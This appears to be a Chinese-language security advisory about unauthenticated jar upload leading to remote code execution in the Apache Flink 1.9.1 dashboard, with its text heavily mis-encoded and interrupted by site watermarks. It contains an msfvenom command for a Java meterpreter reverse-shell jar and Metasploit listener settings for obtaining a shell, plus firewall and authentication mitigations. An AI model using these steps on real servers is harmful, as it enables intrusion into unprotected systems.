Apache Flink í§ÒâJar°üÉÏ´«µ¼ÖÂÔ¶³Ì´úÂëÖ´ÐÐÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-11-14

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÖÁÏÖÔÚ×îа汾Apache Flink 1.9.1


Îó²î¸ÅÊö


Apache FlinkÊÇÓÉApacheÈí¼þ»ù½ð»á¿ª·¢µÄ¿ªÔ´Á÷´¦Öóͷ£¿ò¼Ü£¬£¬£¬Æä½¹µãÊÇÓÃJavaºÍScala±àдµÄÂþÑÜʽÁ÷Êý¾ÝÁ÷ÒýÇæ¡£¡£¡£¡£¡£¡£¡£FlinkÒÔÊý¾Ý²¢ÐкÍÁ÷Ë®Ïß·½·¨Ö´ÐÐí§ÒâÁ÷Êý¾Ý³ÌÐò£¬£¬£¬FlinkµÄÁ÷Ë®ÏßÔËÐÐʱϵͳ¿ÉÒÔÖ´ÐÐÅú´¦Öóͷ£ºÍÁ÷´¦Öóͷ£³ÌÐò¡£¡£¡£¡£¡£¡£¡£±ðµÄ£¬£¬£¬FlinkµÄÔËÐÐʱ×Ô¼ºÒ²Ö§³Öµü´úËã·¨µÄÖ´ÐС£¡£¡£¡£¡£¡£¡£


Apache FlinkµÄÊý¾ÝÁ÷±à³ÌÄ£×ÓÔÚÓÐÏÞºÍÎÞÏÞÊý¾Ý¼¯ÉÏÌṩµ¥´ÎÊÂÎñ£¨event-at-a-time£©´¦Öóͷ£¡£¡£¡£¡£¡£¡£¡£ÔÚ»ù´¡²ãÃæ£¬£¬£¬Flink³ÌÐòÓÉÁ÷ºÍת»»×é³É¡£¡£¡£¡£¡£¡£¡£


Apache FlinkµÄAPI£ºÓнç»òÎÞ½çÊý¾ÝÁ÷µÄÊý¾ÝÁ÷API¡¢ÓÃÓÚÓнçÊý¾Ý¼¯µÄÊý¾Ý¼¯API¡¢±íAPI¡£¡£¡£¡£¡£¡£¡£


Apache Flink Dashboard ÖпÉÉÏ´«¶ñÒâjar°ü²¢´¥·¢¶ñÒâ´úÂëÖ´ÐС£¡£¡£¡£¡£¡£¡£ÓÉÓÚApache Flink Dashboard ĬÈÏÎÞÐèÈÏÖ¤¼´¿É»á¼û£¬£¬£¬Òò´Ë¸ÃÎó²î¿ÉÓÃ×÷»ñÈ¡shell¡£¡£¡£¡£¡£¡£¡£


Îó²îÑéÖ¤


POC£ºhttps://twitter.com/jas502n/status/1193869996717297664¡£¡£¡£¡£¡£¡£¡£


²âÊÔÇéÐΣºApache Flink 1.9.1


1¡¢ÉÏ´«msfÌìÉúµÄjar°ü,ÌìÉúrce.jarÎļþ


msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


2¡¢ÉèÖÃmsf¼àÌý


use exploit/multi/handler

set payload java/shell/reverse_tcp

set LHOST 127.0.0.1

set LPORT 8087

show options

run


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


ÔÚSubmit New Job´¦ÉÏ´«rec.jarÎļþ£¬£¬£¬µã»÷submit


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨


Àֳɷ´µ¯shell£¬£¬£¬Ö´ÐÐid¿É¿´µ½Ð§¹û


¼øºÚµ£±£Íø(jhdbw)¡¤×î¾ßȨÍþΨһάȨµ£±£Æ½Ì¨



ÐÞ¸´½¨Òé


¸ÃÎó²î¹Ù·½ÉÐδÐû²¼Çå¾²¸üÐÂÒÔ¼°½â¾öÒªÁ죬£¬£¬ÇëÊÜÓ°ÏìµÄÓû§ÊµÊ±¹Ø×¢Apache Flink¹ÙÍø£ºhttps://flink.apache.org/downloads.html¡£¡£¡£¡£¡£¡£¡£


»º½â²½·¥£º

½¨ÒéÉèÖ÷À»ðǽսÂÔ£¬£¬£¬½öÔÊÐí°×Ãûµ¥ip»á¼û apache flinkЧÀÍ£¬£¬£¬²¢ÔÚWebÊðÀí£¨Èçapache httpd£©ÖÐÔöÌí¶Ô¸ÃЧÀ͵ÄdigestÈÏÖ¤¡£¡£¡£¡£¡£¡£¡£


²Î¿¼Á´½Ó


https://twitter.com/jas502n/status/1193869996717297664